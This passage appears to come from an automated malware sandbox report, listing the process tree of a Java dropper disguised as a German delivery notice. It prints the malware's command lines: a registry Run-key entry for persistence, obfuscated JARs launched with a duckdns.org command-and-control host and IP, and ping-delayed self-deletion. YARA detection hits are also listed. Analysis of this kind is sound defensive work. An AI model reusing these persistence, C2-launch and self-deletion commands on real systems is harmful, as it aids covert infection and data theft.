                                      Wow64 process (32bit):true
                                      Commandline:cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:16
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:17
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:18
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                                      Imagebase:0xb50000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:20
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping localhost -n 6
                                      Imagebase:0x900000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:23
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                                      Imagebase:0x760000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                                      Imagebase:0x760000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000003.2308395794.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000019.00000002.2315301733.000000000421D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000019.00000002.2315301733.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2317473344.0000000014C61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000019.00000002.2315301733.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Has exited:true

                                      Target ID:26
                                      Start time:01:01:57
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:28
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping localhost -n 6
                                      Imagebase:0x900000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:30
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                                      Imagebase:0xc70000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:01:01:58
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping localhost -n 6
                                      Imagebase:0x900000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      No disassembly